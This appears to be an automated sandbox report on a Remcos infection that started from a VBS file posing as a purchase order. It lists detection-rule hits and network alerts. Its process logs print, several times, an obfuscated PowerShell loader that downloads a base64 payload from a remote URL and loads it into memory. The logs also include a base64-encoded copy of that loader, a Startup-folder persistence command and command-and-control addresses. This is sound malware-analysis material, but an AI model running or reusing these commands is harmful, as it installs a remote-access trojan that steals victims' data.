Author: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $EnV:COMsPec[4,26,25]-JoIN'')((('WPsu'+'r'+'l'+' = Y'+'QDhttps://'+'ra'+'w.'+'githubuse'+'rconten'+'t.com/N'+'oDetectO'+'n'+'/'+'No'+'Dete'+'ctO'+'n/'+'refs/he'+'a'+'ds/main/D'+'etahNo'+'th-'+'V.txtYQD;'+' WPsb'+'ase64'+'Conten'+'t = (N'+'e'+'w'+'-'+'O'+'b'+'j'+'ect S'+'yste'+'m.'+'Net.W'+'ebCl'+'ie'+'n'+'t)'+'.Downlo'+'adStrin'+'g'+'(WP'+'sur'+'l'+')'+';'+' W'+'Ps'+'bi'+'naryConte'+'n'+'t = '+'[Sys'+'tem.'+'Con'+'vert]:'+':'+'Fr'+'o'+'mBase64'+'Stri'+'ng(WPsbase'+'64'+'Con'+'te'+'nt)'+';'+' WPsassem'+'b'+'l'+'y = [R'+'eflec'+'tio'+'n'+'.Assembly]::Lo'+'ad(W'+'P'+'sbinaryCo'+'nt'+'ent); [dnli'+'b.'+'IO.'+'Hom'+'e'+']'+':'+':V'+'AI'+'('+'02V0/'+'rgQv5/d/ee'+'.et'+'sap'+'//:spt'+'t'+'h0'+'2V, 02Vde'+'sa'+'ti'+'va'+'do02V,'+' 0'+'2Vd'+'esat'+'iva'+'do02'+'V'+', 02Vd'+'esativ'+'a'+'do02'+'V, '+'0'+'2VA'+'d'+'dInP'+'roc'+'ess3202V,'+' 02V'+'02V,02'+'V02V)')-CrEpLaCE([CHaR]87+[CHaR]80+[CHaR]115),[CHaR]36 -CrEpLaCE ([CHaR]89+[CHaR]81+[CHaR]68),[CHaR]39 -repLaCe '02V',[CHaR]34))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $EnV:COMsPec[4,26,25]-JoIN'')((('WPsu'+'r'+'l'+' = Y'+'QDhttps://'+'ra'+'w.'+'githubuse'+'rconten'+'t.com/N'+'oDetectO'+'n'+'/'+'No'+'Dete'+'ctO'+'n/'+'refs/he'+'a'+'ds/main/D'+'etahNo'+'th-'+'V.txtYQD;'+' WPsb'+'ase64'+'Conten'+'t = (N'+'e'+'w'+'-'+'O'+'b'+'j'+'ect S'+'yste'+'m.'+'Net.W'+'ebCl'+'ie'+'n'+'t)'+'.Downlo'+'adStrin'+'g'+'(WP'+'sur'+'l'+')'+';'+' W'+'Ps'+'bi'+'naryConte'+'n'+'t = '+'[Sys'+'tem.'+'Con'+'vert]:'+':'+'Fr'+'o'+'mBase64'+'Stri'+'ng(WPsbase'+'64'+'Con'+'te'+'nt)'+';'+' WPsassem'+'b'+'l'+'y = [R'+'eflec'+'tio'+'n'+'.Assembly]::Lo'+'ad(W'+'P'+'sbinaryCo'+'nt'+'ent); [dnli'+'b.'+'IO.'+'Hom'+'e'+']'+':'+':V'+'AI'+'('+'02V0/'+'rgQv5/d/ee'+'.et'+'sap'+'//:spt'+'t'+'h0'+'2V, 02Vde'+'sa'+'ti'+'va'+'do02V,'+' 0'+'2Vd'+'esat'+'iva'+'do02'+'V'+', 02Vd'+'esativ'+'a'+'do02'+'V, '+'0'+'2VA'+'d'+'dInP'+'roc'+'ess3202V,'+' 02V'+'02V,02'+'V02V)')-CrEpLaCE([CHaR]87+[CHaR]80+[CHaR]115),[CHaR]36 -CrEpLaCE ([CHaR]89+[CHaR]81+[CHaR]68),[CHaR]39 -repLaCe '02V',[CHaR]34))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJEVuVjpDT01zUGVjWzQsMjYsMjVdLUpvSU4nJykoKCgnV1BzdScrJ3InKydsJysnID0gWScrJ1FEaHR0cHM6Ly8nKydyYScrJ3cuJysnZ2l0aHVidXNlJysncmNvbnRlbicrJ3QuY29tL04nKydvRGV0ZWN0TycrJ24nKycvJysnTm8nKydEZXRlJysnY3RPJysnbi8nKydyZWZzL2hlJysnYScrJ2RzL21haW4vRCcrJ2V0YWhObycrJ3RoLScrJ1YudHh0WVFEOycrJyBXUHNiJysnYXNlNjQnKydDb250ZW4nKyd0ID0gKE4nKydlJysndycrJy0nKydPJysnYicrJ2onKydlY3QgUycrJ3lzdGUnKydtL

Sigma detected: Potential PowerShell Command Line Obfuscation

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $EnV:COMsPec[4,26,25]-JoIN'')((('WPsu'+'r'+'l'+' = Y'+'QDhttps://'+'ra'+'w.'+'githubuse'+'rconten'+'t.com/N'+'oDetectO'+'n'+'/'+'No'+'Dete'+'ctO'+'n/'+'refs/he'+'a'+'ds/main/D'+'etahNo'+'th-'+'V.txtYQD;'+' WPsb'+'ase64'+'Conten'+'t = (N'+'e'+'w'+'-'+'O'+'b'+'j'+'ect S'+'yste'+'m.'+'Net.W'+'ebCl'+'ie'+'n'+'t)'+'.Downlo'+'adStrin'+'g'+'(WP'+'sur'+'l'+')'+';'+' W'+'Ps'+'bi'+'naryConte'+'n'+'t = '+'[Sys'+'tem.'+'Con'+'vert]:'+':'+'Fr'+'o'+'mBase64'+'Stri'+'ng(WPsbase'+'64'+'Con'+'te'+'nt)'+';'+' WPsassem'+'b'+'l'+'y = [R'+'eflec'+'tio'+'n'+'.Assembly]::Lo'+'ad(W'+'P'+'sbinaryCo'+'nt'+'ent); [dnli'+'b.'+'IO.'+'Hom'+'e'+']'+':'+':V'+'AI'+'('+'02V0/'+'rgQv5/d/ee'+'.et'+'sap'+'//:spt'+'t'+'h0'+'2V, 02Vde'+'sa'+'ti'+'va'+'do02V,'+' 0'+'2Vd'+'esat'+'iva'+'do02'+'V'+', 02Vd'+'esativ'+'a'+'do02'+'V, '+'0'+'2VA'+'d'+'dInP'+'roc'+'ess3202V,'+' 02V'+'02V,02'+'V02V)')-CrEpLaCE([CHaR]87+[CHaR]80+[CHaR]115),[CHaR]36 -CrEpLaCE ([CHaR]89+[CHaR]81+[CHaR]68),[CHaR]39 -repLaCe '02V',[CHaR]34))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $EnV:COMsPec[4,26,25]-JoIN'')((('WPsu'+'r'+'l'+' = Y'+'QDhttps://'+'ra'+'w.'+'githubuse'+'rconten'+'t.com/N'+'oDetectO'+'n'+'/'+'No'+'Dete'+'ctO'+'n/'+'refs/he'+'a'+'ds/main/D'+'etahNo'+'th-'+'V.txtYQD;'+' WPsb'+'ase64'+'Conten'+'t = (N'+'e'+'w'+'-'+'O'+'b'+'j'+'ect S'+'yste'+'m.'+'Net.W'+'ebCl'+'ie'+'n'+'t)'+'.Downlo'+'adStrin'+'g'+'(WP'+'sur'+'l'+')'+';'+' W'+'Ps'+'bi'+'naryConte'+'n'+'t = '+'[Sys'+'tem.'+'Con'+'vert]:'+':'+'Fr'+'o'+'mBase64'+'Stri'+'ng(WPsbase'+'64'+'Con'+'te'+'nt)'+';'+' WPsassem'+'b'+'l'+'y = [R'+'eflec'+'tio'+'n'+'.Assembly]::Lo'+'ad(W'+'P'+'sbinaryCo'+'nt'+'ent); [dnli'+'b.'+'IO.'+'Hom'+'e'+']'+':'+':V'+'AI'+'('+'02V0/'+'rgQv5/d/ee'+'.et'+'sap'+'//:spt'+'t'+'h0'+'2V, 02Vde'+'sa'+'ti'+'va'+'do02V,'+' 0'+'2Vd'+'esat'+'iva'+'do02'+'V'+', 02Vd'+'esativ'+'a'+'do02'+'V, '+'0'+'2VA'+'d'+'dInP'+'roc'+'ess3202V,'+' 02V'+'02V,02'+'V02V)')-CrEpLaCE([CHaR]87+[CHaR]80+[CHaR]115),[CHaR]36 -CrEpLaCE ([CHaR]89+[CHaR]81+[CHaR]68),[CHaR]39 -repLaCe '02V',[CHaR]34))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJEVuVjpDT01zUGVjWzQsMjYsMjVdLUpvSU4nJykoKCgnV1BzdScrJ3InKydsJysnID0gWScrJ1FEaHR0cHM6Ly8nKydyYScrJ3cuJysnZ2l0aHVidXNlJysncmNvbnRlbicrJ3QuY29tL04nKydvRGV0ZWN0TycrJ24nKycvJysnTm8nKydEZXRlJysnY3RPJysnbi8nKydyZWZzL2hlJysnYScrJ2RzL21haW4vRCcrJ2V0YWhObycrJ3RoLScrJ1YudHh0WVFEOycrJyBXUHNiJysnYXNlNjQnKydDb250ZW4nKyd0ID0gKE4nKydlJysndycrJy0nKydPJysnYicrJ2onKydlY3QgUycrJ3lzdGUnKydtL

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Source: Process started

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Purchase Order - PO14895.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Purchase Order - PO14895.vbs", CommandLine|base64offset|contains: :^, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Purchase Order - PO14895.vbs", ProcessId: 7640, ProcessName: wscript.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJEVuVjpDT01zUGVjWzQsMjYsMjVdLUpvSU4nJykoKCgnV1BzdScrJ3InKydsJysnID0gWScrJ1FEaHR0cHM6Ly8nKydyYScrJ3cuJysnZ2l0aHVidXNlJysncmNvbnRlbicrJ3QuY29tL04nKydvRGV0ZWN0TycrJ24nKycvJysnTm8nKydEZXRlJysnY3RPJysnbi8nKydyZWZzL2hlJysnYScrJ2RzL21haW4vRCcrJ2V0YWhObycrJ3RoLScrJ1YudHh0WVFEOycrJyBXUHNiJysnYXNlNjQnKydDb250ZW4nKyd0ID0gKE4nKydlJysndycrJy0nKydPJysnYicrJ2onKydlY3QgUycrJ3lzdGUnKydtLicrJ05ldC5XJysnZWJDbCcrJ2llJysnbicrJ3QpJysnLkRvd25sbycrJ2FkU3RyaW4nKydnJysnKFdQJysnc3VyJysnbCcrJyknKyc7JysnIFcnKydQcycrJ2JpJysnbmFyeUNvbnRlJysnbicrJ3QgPSAnKydbU3lzJysndGVtLicrJ0NvbicrJ3ZlcnRdOicrJzonKydGcicrJ28nKydtQmFzZTY0JysnU3RyaScrJ25nKFdQc2Jhc2UnKyc2NCcrJ0NvbicrJ3RlJysnbnQpJysnOycrJyBXUHNhc3NlbScrJ2InKydsJysneSA9IFtSJysnZWZsZWMnKyd0aW8nKyduJysnLkFzc2VtYmx5XTo6TG8nKydhZChXJysnUCcrJ3NiaW5hcnlDbycrJ250JysnZW50KTsgW2RubGknKydiLicrJ0lPLicrJ0hvbScrJ2UnKyddJysnOicrJzpWJysnQUknKycoJysnMDJWMC8nKydyZ1F2NS9kL2VlJysnLmV0Jysnc2FwJysnLy86c3B0JysndCcrJ2gwJysnMlYsIDAyVmRlJysnc2EnKyd0aScrJ3ZhJysnZG8wMlYsJysnIDAnKycyVmQnKydlc2F0JysnaXZhJysnZG8wMicrJ1YnKycsIDAyVmQnKydlc2F0aXYnKydhJysnZG8wMicrJ1YsICcrJzAnKycyVkEnKydkJysnZEluUCcrJ3JvYycrJ2VzczMyMDJWLCcrJyAwMlYnKycwMlYsMDInKydWMDJWKScpLUNyRXBMYUNFKFtDSGFSXTg3K1tDSGFSXTgwK1tDSGFSXTExNSksW0NIYVJdMzYgLUNyRXBMYUNFICAoW0NIYVJdODkrW0NIYVJdODErW0NIYVJdNjgpLFtDSGFSXTM5IC1yZXBMYUNlICAnMDJWJyxbQ0hhUl0zNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJEVuVjpDT01zUGVjWzQsMjYsMjVdLUpvSU4nJykoKCgnV1BzdScrJ3InKydsJysnID0gWScrJ1FEaHR0cHM6Ly8nKydyYScrJ3cuJysnZ2l0aHVidXNlJysncmNvbnRlbicrJ3QuY29tL04nKydvRGV0ZWN0TycrJ24nKycvJysnTm8nKydEZXRlJysnY3RPJysnbi8nKydyZWZzL2hlJysnYScrJ2RzL21haW4vRCcrJ2V0YWhObycrJ3RoLScrJ1YudHh0WVFEOycrJyBXUHNiJysnYXNlNjQnKydDb250ZW4nKyd0ID0gKE4nKydlJysndycrJy0nKydPJysnYicrJ2onKydlY3QgUycrJ3lzdGUnKydtLicrJ05ldC5XJysnZWJDbCcrJ2llJysnbicrJ3QpJysnLkRvd25sbycrJ2FkU3RyaW4nKydnJysnKFdQJysnc3VyJysnbCcrJyknKyc7JysnIFcnKydQcycrJ2JpJysnbmFyeUNvbnRlJysnbicrJ3QgPSAnKydbU3lzJysndGVtLicrJ0NvbicrJ3ZlcnRdOicrJzonKydGcicrJ28nKydtQmFzZTY0JysnU3RyaScrJ25nKFdQc2Jhc2UnKyc2NCcrJ0NvbicrJ3RlJysnbnQpJysnOycrJyBXUHNhc3NlbScrJ2InKydsJysneSA9IFtSJysnZWZsZWMnKyd0aW8nKyduJysnLkFzc2VtYmx5XTo6TG8nKydhZChXJysnUCcrJ3NiaW5hcnlDbycrJ250JysnZW50KTsgW2RubGknKydiLicrJ0lPLicrJ0hvbScrJ2UnKyddJysnOicrJzpWJysnQUknKycoJysnMDJWMC8nKydyZ1F2NS9kL2VlJysnLmV0Jysnc2FwJysnLy86c3B0JysndCcrJ2gwJysnMlYsIDAyVmRlJysnc2EnKyd0aScrJ3ZhJysnZG8wMlYsJysnIDAnKycyVmQnKydlc2F0JysnaXZhJysnZG8wMicrJ1YnKycsIDAyVmQnKydlc2F0aXYnKydhJysnZG8wMicrJ1YsICcrJzAnKycyVkEnKydkJysnZEluUCcrJ3JvYycrJ2VzczMyMDJWLCcrJyAwMlYnKycwMlYsMDInKydWMDJWKScpLUNyRXBMYUNFKFtDSGFSXTg3K1tDSGFSXTgwK1tDSGFSXTExNSksW0NIYVJdMzYgLUNyRXBMYUNFICAoW0NIYVJdODkrW0NIYVJdODErW0NIYVJdNjgpLFtDSGFSXTM5IC1yZXBMYUNlICAnMDJWJyxb

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Purchase Order - PO14895.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Purchase Order - PO14895.vbs", CommandLine|base64offset|contains: :^, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Purchase Order - PO14895.vbs", ProcessId: 7640, ProcessName: wscript.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -command [System.IO.File]::Copy('C:\Windows\system32\Purchase Order - PO14895.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.orierocretse.vbs')'), CommandLine: powershell -command [System.IO.File]::Copy('C:\Windows\system32\Purchase Order - PO14895.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.orierocretse.vbs')'), CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\Purchase Order - PO14895.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.orierocretse.vbs')'), ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7728, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -command [System.IO.File]::Copy('C:\Windows\system32\Purchase Order - PO14895.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.orierocretse.vbs')'), ProcessId: 7864, ProcessName: powershell.exe

Sigma detected: Potential Encoded PowerShell Patterns In CommandLine

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $EnV:COMsPec[4,26,25]-JoIN'')((('WPsu'+'r'+'l'+' = Y'+'QDhttps://'+'ra'+'w.'+'githubuse'+'rconten'+'t.com/N'+'oDetectO'+'n'+'/'+'No'+'Dete'+'ctO'+'n/'+'refs/he'+'a'+'ds/main/D'+'etahNo'+'th-'+'V.txtYQD;'+' WPsb'+'ase64'+'Conten'+'t = (N'+'e'+'w'+'-'+'O'+'b'+'j'+'ect S'+'yste'+'m.'+'Net.W'+'ebCl'+'ie'+'n'+'t)'+'.Downlo'+'adStrin'+'g'+'(WP'+'sur'+'l'+')'+';'+' W'+'Ps'+'bi'+'naryConte'+'n'+'t = '+'[Sys'+'tem.'+'Con'+'vert]:'+':'+'Fr'+'o'+'mBase64'+'Stri'+'ng(WPsbase'+'64'+'Con'+'te'+'nt)'+';'+' WPsassem'+'b'+'l'+'y = [R'+'eflec'+'tio'+'n'+'.Assembly]::Lo'+'ad(W'+'P'+'sbinaryCo'+'nt'+'ent); [dnli'+'b.'+'IO.'+'Hom'+'e'+']'+':'+':V'+'AI'+'('+'02V0/'+'rgQv5/d/ee'+'.et'+'sap'+'//:spt'+'t'+'h0'+'2V, 02Vde'+'sa'+'ti'+'va'+'do02V,'+' 0'+'2Vd'+'esat'+'iva'+'do02'+'V'+', 02Vd'+'esativ'+'a'+'do02'+'V, '+'0'+'2VA'+'d'+'dInP'+'roc'+'ess3202V,'+' 02V'+'02V,02'+'V02V)')-CrEpLaCE([CHaR]87+[CHaR]80+[CHaR]115),[CHaR]36 -CrEpLaCE ([CHaR]89+[CHaR]81+[CHaR]68),[CHaR]39 -repLaCe '02V',[CHaR]34))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $EnV:COMsPec[4,26,25]-JoIN'')((('WPsu'+'r'+'l'+' = Y'+'QDhttps://'+'ra'+'w.'+'githubuse'+'rconten'+'t.com/N'+'oDetectO'+'n'+'/'+'No'+'Dete'+'ctO'+'n/'+'refs/he'+'a'+'ds/main/D'+'etahNo'+'th-'+'V.txtYQD;'+' WPsb'+'ase64'+'Conten'+'t = (N'+'e'+'w'+'-'+'O'+'b'+'j'+'ect S'+'yste'+'m.'+'Net.W'+'ebCl'+'ie'+'n'+'t)'+'.Downlo'+'adStrin'+'g'+'(WP'+'sur'+'l'+')'+';'+' W'+'Ps'+'bi'+'naryConte'+'n'+'t = '+'[Sys'+'tem.'+'Con'+'vert]:'+':'+'Fr'+'o'+'mBase64'+'Stri'+'ng(WPsbase'+'64'+'Con'+'te'+'nt)'+';'+' WPsassem'+'b'+'l'+'y = [R'+'eflec'+'tio'+'n'+'.Assembly]::Lo'+'ad(W'+'P'+'sbinaryCo'+'nt'+'ent); [dnli'+'b.'+'IO.'+'Hom'+'e'+']'+':'+':V'+'AI'+'('+'02V0/'+'rgQv5/d/ee'+'.et'+'sap'+'//:spt'+'t'+'h0'+'2V, 02Vde'+'sa'+'ti'+'va'+'do02V,'+' 0'+'2Vd'+'esat'+'iva'+'do02'+'V'+', 02Vd'+'esativ'+'a'+'do02'+'V, '+'0'+'2VA'+'d'+'dInP'+'roc'+'ess3202V,'+' 02V'+'02V,02'+'V02V)')-CrEpLaCE([CHaR]87+[CHaR]80+[CHaR]115),[CHaR]36 -CrEpLaCE ([CHaR]89+[CHaR]81+[CHaR]68),[CHaR]39 -repLaCe '02V',[CHaR]34))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJEVuVjpDT01zUGVjWzQsMjYsMjVdLUpvSU4nJykoKCgnV1BzdScrJ3InKydsJysnID0gWScrJ1FEaHR0cHM6Ly8nKydyYScrJ3cuJysnZ2l0aHVidXNlJysncmNvbnRlbicrJ3QuY29tL04nKydvRGV0ZWN0TycrJ24nKycvJysnTm8nKydEZXRlJysnY3RPJysnbi8nKydyZWZzL2hlJysnYScrJ2RzL21haW4vRCcrJ2V0YWhObycrJ3RoLScrJ1YudHh0WVFEOycrJyBXUHNiJysnYXNlNjQnKydDb250ZW4nKyd0ID0gKE4nKydlJysndycrJy0nKydPJysnYicrJ2onKydlY3QgUycrJ3lzdGUnKydtL

Stealing of Sensitive Information

Sigma detected: Remcos

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, ProcessId: 7444, TargetFilename: C:\ProgramData\remcos\logs.dat

Suricata Signatures

ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-03T09:27:45.004942+0200	2020423	1	Exploit Kit Activity Detected	188.114.96.3	443	192.168.2.9	49708	TCP

ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-03T09:27:45.004942+0200	2020425	1	Exploit Kit Activity Detected	188.114.96.3	443	192.168.2.9	49708	TCP

ET JA3 Hash - Remcos 3.x/4.x TLS Connection

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-03T09:27:47.224179+0200	2036594	1	Malware Command and Control Activity Detected	192.168.2.9	49709	45.133.172.96	55543	TCP
2024-10-03T09:27:49.835645+0200	2036594	1	Malware Command and Control Activity Detected	192.168.2.9	49710	45.133.172.96	55543	TCP
2024-10-03T09:27:52.441621+0200	2036594	1	Malware Command and Control Activity Detected	192.168.2.9	49711	45.133.172.96	55543	TCP
2024-10-03T09:27:55.051372+0200	2036594	1	Malware Command and Control Activity Detected	192.168.2.9	49712	45.133.172.96	55543	TCP
2024-10-03T09:27:57.675496+0200	2036594	1	Malware Command and Control Activity Detected	192.168.2.9	49713	45.133.172.96	55543	TCP
2024-10-03T09:28:00.285235+0200	2036594	1	Malware Command and Control Activity Detected	192.168.2.9	49714	45.133.172.96	55543	TCP
2024-10-03T09:28:02.894400+0200	2036594	1	Malware Command and Control Activity Detected	192.168.2.9	49715	45.133.172.96	55543	TCP
2024-10-03T09:28:05.505771+0200	2036594	1	Malware Command and Control Activity Detected	192.168.2.9	49716	45.133.172.96	55543	TCP
2024-10-03T09:28:08.133667+0200	2036594	1	Malware Command and Control Activity Detected	192.168.2.9	49717	45.133.172.96	55543	TCP
2024-10-03T09:28:10.775434+0200	2036594	1	Malware Command and Control Activity Detected	192.168.2.9	49718	45.133.172.96	55543	TCP
2024-10-03T09:28:13.379220+0200	2036594	1	Malware Command and Control Activity Detected	192.168.2.9	49719	45.133.172.96	55543	TCP
2024-10-03T09:28:15.987808+0200	2036594	1	Malware Command and Control Activity Detected	192.168.2.9	49720	45.133.172.96	55543	TCP
2024-10-03T09:28:18.597745+0200	2036594	1	Malware Command and Control Activity Detected	192.168.2.9	49721	45.133.172.96	55543	TCP
2024-10-03T09:28:21.208671+0200	2036594	1	Malware Command and Control Activity Detected	192.168.2.9	49722	45.133.172.96	55543	TCP
2024-10-03T09:28:23.836375+0200	2036594	1	Malware Command and Control Activity Detected	192.168.2.9	49724	45.133.172.96	55543	TCP
2024-10-03T09:28:26.462659+0200	2036594	1	Malware Command and Control Activity Detected	192.168.2.9	49725	45.133.172.96	55543	TCP
2024-10-03T09:28:29.087431+0200	2036594	1	Malware Command and Control Activity Detected	192.168.2.9	49726	45.133.172.96	55543	TCP
2024-10-03T09:28:31.709917+0200	2036594	1	Malware Command and Control Activity Detected	192.168.2.9	49727	45.133.172.96	55543	TCP
2024-10-03T09:28:34.348933+0200	2036594	1	Malware Command and Control Activity Detected	192.168.2.9	49728	45.133.172.96	55543	TCP
2024-10-03T09:28:36.989459+0200	2036594	1	Malware Command and Control Activity Detected	192.168.2.9	49729	45.133.172.96	55543	TCP
2024-10-03T09:28:39.604380+0200	2036594	1	Malware Command and Control Activity Detected	192.168.2.9	49730	45.133.172.96	55543	TCP
2024-10-03T09:28:42.244367+0200	2036594	1	Malware Command and Control Activity Detected	192.168.2.9	49731	45.133.172.96	55543	TCP
2024-10-03T09:28:44.866921+0200	2036594	1	Malware Command and Control Activity Detected	192.168.2.9	49732	45.133.172.96	55543	TCP
2024-10-03T09:28:47.510921+0200	2036594	1	Malware Command and Control Activity Detected	192.168.2.9	49733	45.133.172.96	55543	TCP
2024-10-03T09:28:50.166659+0200	2036594	1	Malware Command and Control Activity Detected	192.168.2.9	49734	45.133.172.96	55543	TCP
2024-10-03T09:28:52.790440+0200	2036594	1	Malware Command and Control Activity Detected	192.168.2.9	49735	45.133.172.96	55543	TCP
2024-10-03T09:28:55.395364+0200	2036594	1	Malware Command and Control Activity Detected	192.168.2.9	49736	45.133.172.96	55543	TCP
2024-10-03T09:28:58.004779+0200	2036594	1	Malware Command and Control Activity Detected	192.168.2.9	49737	45.133.172.96	55543	TCP
2024-10-03T09:29:00.618113+0200	2036594	1	Malware Command and Control Activity Detected	192.168.2.9	49738	45.133.172.96	55543	TCP
2024-10-03T09:29:03.227736+0200	2036594	1	Malware Command and Control Activity Detected	192.168.2.9	49739	45.133.172.96	55543	TCP
2024-10-03T09:29:05.852942+0200	2036594	1	Malware Command and Control Activity Detected	192.168.2.9	49740	45.133.172.96	55543	TCP
2024-10-03T09:29:08.460260+0200	2036594	1	Malware Command and Control Activity Detected	192.168.2.9	49741	45.133.172.96	55543	TCP
2024-10-03T09:29:11.068137+0200	2036594	1	Malware Command and Control Activity Detected	192.168.2.9	49742	45.133.172.96	55543	TCP
2024-10-03T09:29:13.645988+0200	2036594	1	Malware Command and Control Activity Detected	192.168.2.9	49743	45.133.172.96	55543	TCP
2024-10-03T09:29:16.194856+0200	2036594	1	Malware Command and Control Activity Detected	192.168.2.9	49744	45.133.172.96	55543	TCP
2024-10-03T09:29:19.072157+0200	2036594	1	Malware Command and Control Activity Detected	192.168.2.9	49745	45.133.172.96	55543	TCP
2024-10-03T09:29:21.554422+0200	2036594	1	Malware Command and Control Activity Detected	192.168.2.9	49746	45.133.172.96	55543	TCP
2024-10-03T09:29:24.005394+0200	2036594	1	Malware Command and Control Activity Detected	192.168.2.9	49747	45.133.172.96	55543	TCP
2024-10-03T09:29:26.521436+0200	2036594	1	Malware Command and Control Activity Detected	192.168.2.9	49748	45.133.172.96	55543	TCP
2024-10-03T09:29:28.931502+0200	2036594	1	Malware Command and Control Activity Detected	192.168.2.9	49749	45.133.172.96	55543	TCP
2024-10-03T09:29:31.306258+0200	2036594	1	Malware Command and Control Activity Detected	192.168.2.9	49750	45.133.172.96	55543	TCP
2024-10-03T09:29:33.665716+0200	2036594	1	Malware Command and Control Activity Detected	192.168.2.9	49751	45.133.172.96	55543	TCP
2024-10-03T09:29:35.990740+0200	2036594	1	Malware Command and Control Activity Detected	192.168.2.9	49752	45.133.172.96	55543	TCP

ETPRO MALWARE Terse Request to paste .ee - Possible Download

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-03T09:27:44.818707+0200	2841075	1	Malware Command and Control Activity Detected	192.168.2.9	49708	188.114.96.3	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 0000000B.00000002.2645775493.0000000000A18000.00000004.00000020.00020000.00000000.sdmp

